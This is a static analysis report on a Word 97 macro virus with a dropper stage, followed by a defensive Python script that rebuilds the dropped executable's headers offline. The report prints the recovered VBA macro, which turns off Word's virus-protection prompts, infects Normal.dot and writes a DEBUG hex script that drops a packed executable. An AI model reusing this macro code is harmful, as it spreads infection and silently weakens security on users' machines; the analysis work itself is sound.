Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bb2775ee5dd3f58c…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 157.5 KB
Created (OLE metadata): 1997-01-29 21:56:00
Authoring application: Microsoft Word 8.0 (Word 97)
First seen: 2012-06-14
MD5: 589881b98f9eabd13583d8b1522e8ca3
SHA-1: a0c2fb0a7de44da518e6b4bae19d58b17a43eea9
SHA-256: bb2775ee5dd3f58cbb24ec4e8ce065d495f5ab21e59951aaed77a61e31df279c
Risk score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1105 Ingress Tool Transfer (weakly supported: the recovered macro carries its executable inline as a DEBUG hex script and fetches nothing from a remote host)

The critical OLE_VBA_SHELL heuristic fires because the VBA project calls Shell(). The recovered source is a Word 97 macro virus with a dropper stage, all of it in a single AutoClose routine, so it runs when the user closes the document; errors are silenced with On Error Resume Next. The routine first sets Options.VirusProtection, Options.SaveNormalPrompt and Options.ConfirmConversions to False, which switches off Word's macro-virus warning and the prompt that would otherwise reveal that Normal.dot is about to be modified. It then compares the line counts of the first code module in ActiveDocument and in NormalTemplate. If the Normal template is still clean, it becomes the target and the document's module is exported to c:\kloop.dat; if the open document is clean, it becomes the target and the copy of c:\kloop.dat already on disk from an earlier infection is reused; if both already carry code, the infection step is skipped. The code is imported into the target with AddFromFile, the first four lines of the module are deleted, and a freshly infected document is saved back over itself with SaveAs.

The dropper stage runs on every close. After deleting C:\KLOOP.DBG, C:\KLOOP.EX and C:\KLOOP.BAT, and unless C:\KLOOP.EXE already exists (the Dir check), it writes a DEBUG.EXE script to C:\KLOOP.DBG: the N command names the output file C:\KLOOP.EX, and a long run of E commands enters the bytes of a Win32 executable starting at offset 0100h, the address at which DEBUG keeps file data. The bytes visible in the preview form a complete MZ/PE header for an i386 PE32 console image (Machine 014Ch, Subsystem 3, entry point 0BB80h, image base 00400000h); the section names UPX0, UPX1 and UPX2 identify a UPX-packed payload, and the entry point falls inside UPX1 as a UPX stub requires. The linker timestamp 39742BBEh corresponds to 18 July 2000, later than the document's 1997 creation stamp, so the OLE metadata should not be read as the date of the campaign. The Kill of C:\KLOOP.BAT together with the Shell() call points to a batch-file stage, not shown in the truncated preview, that is expected to feed the script to DEBUG and execute the result as C:\KLOOP.EXE. Because the executable is carried inside the macro rather than fetched from a remote host, the sample is a dropper rather than a downloader, the T1105 (Ingress Tool Transfer) mapping above is not supported by the recovered code, and the purpose of the dropped payload cannot be determined from its header alone.

Heuristics (5)

  • OLE_VBA_MACROS [medium] VBA macros detected (3 related findings)
    Document contains VBA macro code.
  • OLE_VBA_SHELL [critical] Shell() call in VBA
    The VBA project calls Shell(), i.e. it launches an external program.
  • OLE_VBA_AUTOCLOSE [high] Auto_Close macro
    The code runs automatically when the document is closed (AutoClose), so opening and closing the file is enough to trigger it.
  • OLE_VBA_PCODE_AUTOEXEC_EXEC [high] VBA p-code auto-exec with execution tokens
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable; here it corroborates the decompiled source.
  • OLE_LEGACY_WORDBASIC_AUTOEXEC [medium] Legacy WordBasic auto-exec macro marker
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, with no modern VBA project recovered and no stronger macro-virus family marker present. This is analyst-facing evidence for the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample the premise does not hold: a VBA project was recovered (see Extracted artifacts), so this hit most likely keyed on the same AutoClose name and adds no independent evidence.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)   75537 bytes
SHA-256: 13f8af63dd9ac9f7a4e584e409d71c15190f41829767e4714b2d8552b5f7dcaa

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoClose()
On Error Resume Next

Options.VirusProtection = (0 - 0)
Options.SaveNormalPrompt = (0 - 0)
Options.ConfirmConversions = (0 - 0)

ad = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
nt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines

If nt = 0 Then
    Set host = NormalTemplate.VBProject.VBComponents.Item(1)
    ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\kloop.dat"
End If

If ad = 0 Then Set host = ActiveDocument.VBProject.VBComponents.Item(1)
If nt > 0 And ad > 0 Then GoTo err

host.codemodule.AddFromFile ("c:\kloop.dat")
With host.codemodule
    For x = 1 To 4
    .deletelines 1
    Next x
End With

err:
If nt <> 0 And ad = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName

Kill "C:\KLOOP.DBG"
Kill "C:\KLOOP.EX"
Kill "C:\KLOOP.BAT"

If Dir("C:\KLOOP.EXE") <> "" Then GoTo NODROP

Open "C:\KLOOP.DBG" For Output As 5
Print #5, "N C:\KLOOP.EX"

Print #5, "E 0100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00"
Print #5, "E 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00"
Print #5, "E 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0130 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00"
Print #5, "E 0140 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68"
Print #5, "E 0150 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F"
Print #5, "E 0160 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20"
Print #5, "E 0170 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00"
Print #5, "E 0180 E7 01 6D 38 A3 60 03 6B A3 60 03 6B A3 60 03 6B"
Print #5, "E 0190 A3 60 02 6B 91 60 03 6B C1 7F 10 6B A0 60 03 6B"
Print #5, "E 01A0 4B 7F 08 6B A2 60 03 6B 4B 7F 09 6B E1 60 03 6B"
Print #5, "E 01B0 20 7C 0D 6B AF 60 03 6B 5C 40 09 6B A2 60 03 6B"
Print #5, "E 01C0 52 69 63 68 A3 60 03 6B 00 00 00 00 00 00 00 00"
Print #5, "E 01D0 50 45 00 00 4C 01 03 00 BE 2B 74 39 00 00 00 00"
Print #5, "E 01E0 00 00 00 00 E0 00 0F 01 0B 01 06 00 00 40 00 00"
Print #5, "E 01F0 00 10 00 00 00 70 00 00 80 BB 00 00 00 80 00 00"
Print #5, "E 0200 00 C0 00 00 00 00 40 00 00 10 00 00 00 02 00 00"
Print #5, "E 0210 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00"
Print #5, "E 0220 00 D0 00 00 00 10 00 00 00 00 00 00 03 00 00 00"
Print #5, "E 0230 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00"
Print #5, "E 0240 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0250 00 C0 00 00 60 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0270 60 C0 00 00 14 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 02C0 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00"
Print #5, "E 02D0 00 70 00 00 00 10 00 00 00 00 00 00 00 04 00 00"
Print #5, "E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 E0"
Print #5, "E 02F0 55 50 58 31 00 00 00 00 00 40 00 00 00 80 00 00"
Print #5, "E 0300 00 3E 00 00 00 04 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0310 00 00 00 00 40 00 00 E0 55 50 58 32 00 00 00 00"
Print #5, "E 0320 00 10 00 00 00 C0 00 00 00 02 00 00 00 42 00 00"
Print #5, "E 0330 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0"
Print #5, "E 0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E
... (truncated)
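The DEBUG script shown in the preview can be replayed offline to recover the dropped executable's headers without running DEBUG or the sample. The following Python is an added example written for this report; it is not code from the sample, from oletools or from the analysis platform. It pulls the Print #5, "N ..." and Print #5, "E ..." lines out of the extracted macro text, lays the bytes down at their DEBUG offsets (DEBUG keeps file data at CS:0100, so 0100h is file offset 0) and walks the MZ, COFF, PE32 optional and section headers. The embedded input is transcribed from the preview above and covers only offsets 0100h to 033Fh, with the all-zero lines left out, so the reassembled buffer is the header portion of a 0x4400-byte image; parse_pe reports it as incomplete instead of guessing the remainder.

```python
"""Replay the DEBUG.EXE script the AutoClose macro drops and parse the PE it rebuilds."""
import re
import struct
from datetime import datetime, timezone

# Constructed input: N/E lines transcribed from the macros.bas preview above (DEBUG
# offsets 0100h-033Fh). The all-zero lines 0120h, 0260h and 0280h-02B0h are left out;
# the replay zero-fills them. The real script continues to the end of the image.
MACRO_EXCERPT = r'''
Print #5, "N C:\KLOOP.EX"
Print #5, "E 0100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00"
Print #5, "E 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00"
Print #5, "E 0130 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00"
Print #5, "E 0140 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68"
Print #5, "E 0150 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F"
Print #5, "E 0160 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20"
Print #5, "E 0170 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00"
Print #5, "E 0180 E7 01 6D 38 A3 60 03 6B A3 60 03 6B A3 60 03 6B"
Print #5, "E 0190 A3 60 02 6B 91 60 03 6B C1 7F 10 6B A0 60 03 6B"
Print #5, "E 01A0 4B 7F 08 6B A2 60 03 6B 4B 7F 09 6B E1 60 03 6B"
Print #5, "E 01B0 20 7C 0D 6B AF 60 03 6B 5C 40 09 6B A2 60 03 6B"
Print #5, "E 01C0 52 69 63 68 A3 60 03 6B 00 00 00 00 00 00 00 00"
Print #5, "E 01D0 50 45 00 00 4C 01 03 00 BE 2B 74 39 00 00 00 00"
Print #5, "E 01E0 00 00 00 00 E0 00 0F 01 0B 01 06 00 00 40 00 00"
Print #5, "E 01F0 00 10 00 00 00 70 00 00 80 BB 00 00 00 80 00 00"
Print #5, "E 0200 00 C0 00 00 00 00 40 00 00 10 00 00 00 02 00 00"
Print #5, "E 0210 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00"
Print #5, "E 0220 00 D0 00 00 00 10 00 00 00 00 00 00 03 00 00 00"
Print #5, "E 0230 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00"
Print #5, "E 0240 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0250 00 C0 00 00 60 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0270 60 C0 00 00 14 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 02C0 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00"
Print #5, "E 02D0 00 70 00 00 00 10 00 00 00 00 00 00 00 04 00 00"
Print #5, "E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 E0"
Print #5, "E 02F0 55 50 58 31 00 00 00 00 00 40 00 00 00 80 00 00"
Print #5, "E 0300 00 3E 00 00 00 04 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0310 00 00 00 00 40 00 00 E0 55 50 58 32 00 00 00 00"
Print #5, "E 0320 00 10 00 00 00 C0 00 00 00 02 00 00 00 42 00 00"
Print #5, "E 0330 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0"
'''

DEBUG_LOAD_OFFSET = 0x100  # DEBUG keeps file data at CS:0100, so 0100h is file offset 0
N_CMD = re.compile(r'"N ([^"]+)"')
E_CMD = re.compile(r'"E ([0-9A-Fa-f]{4})((?: [0-9A-Fa-f]{2})+)"')


def reassemble(vba_text):
    """Replay N (name the output file) and E (enter bytes at offset); gaps stay zero."""
    out_name, chunks = None, []
    for line in vba_text.splitlines():
        n, e = N_CMD.search(line), E_CMD.search(line)
        if n:
            out_name = n.group(1)
        elif e:
            chunks.append((int(e.group(1), 16) - DEBUG_LOAD_OFFSET, bytes.fromhex(e.group(2))))
    if not chunks:
        raise ValueError("no E commands found")
    image = bytearray(max(off + len(data) for off, data in chunks))
    for off, data in chunks:
        image[off:off + len(data)] = data
    return out_name, bytes(image)


def parse_pe(image):
    """Walk MZ -> PE signature -> COFF header -> PE32 optional header -> section table."""
    if image[:2] != b"MZ" or len(image) < 0x40:
        raise ValueError("missing or truncated MZ header")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0" or len(image) < e_lfanew + 24:
        raise ValueError("missing PE signature or truncated COFF header at 0x%X" % e_lfanew)
    machine, nsec, tstamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", image, e_lfanew + 4)
    opt = e_lfanew + 24
    if len(image) < opt + max(opt_size, 0x60) + 40 * nsec:
        raise ValueError("optional header or section table truncated")
    if struct.unpack_from("<H", image, opt)[0] != 0x10B:
        raise ValueError("not a PE32 optional header")
    (entry,) = struct.unpack_from("<I", image, opt + 16)
    image_base, sec_align, file_align = struct.unpack_from("<III", image, opt + 28)
    size_of_image, _, _, subsystem = struct.unpack_from("<IIIH", image, opt + 56)
    sections = []
    for off in range(opt + opt_size, opt + opt_size + 40 * nsec, 40):
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", image, off + 8)
        sections.append(dict(name=image[off:off + 8].rstrip(b"\0").decode("ascii", "replace"),
                             vsize=vsize, vaddr=vaddr, rawsize=rawsize, rawptr=rawptr,
                             chars=struct.unpack_from("<I", image, off + 36)[0]))
    file_end = max((s["rawptr"] + s["rawsize"] for s in sections), default=0)
    return dict(
        e_lfanew=e_lfanew, machine=machine, characteristics=chars,
        timestamp=datetime.fromtimestamp(tstamp, timezone.utc), entry_point=entry,
        image_base=image_base, section_alignment=sec_align, file_alignment=file_align,
        size_of_image=size_of_image, subsystem=subsystem, sections=sections,
        dos_stub_intact=b"This program cannot be run in DOS mode" in image[:e_lfanew],
        packer_hint="UPX" if any(s["name"].startswith("UPX") for s in sections) else None,
        expected_file_size=file_end,      # end of the last section's raw data
        complete=len(image) >= file_end,  # False here: the preview stops inside the headers
    )
```

Call reassemble(MACRO_EXCERPT) and pass the returned bytes to parse_pe; on the full macros.bas the same two calls yield the whole C:\KLOOP.EX image, whose hash can then be looked up without ever executing DEBUG. Section names are a weak packer indicator (they are trivially renamed), which is why the result labels them a hint rather than a verdict.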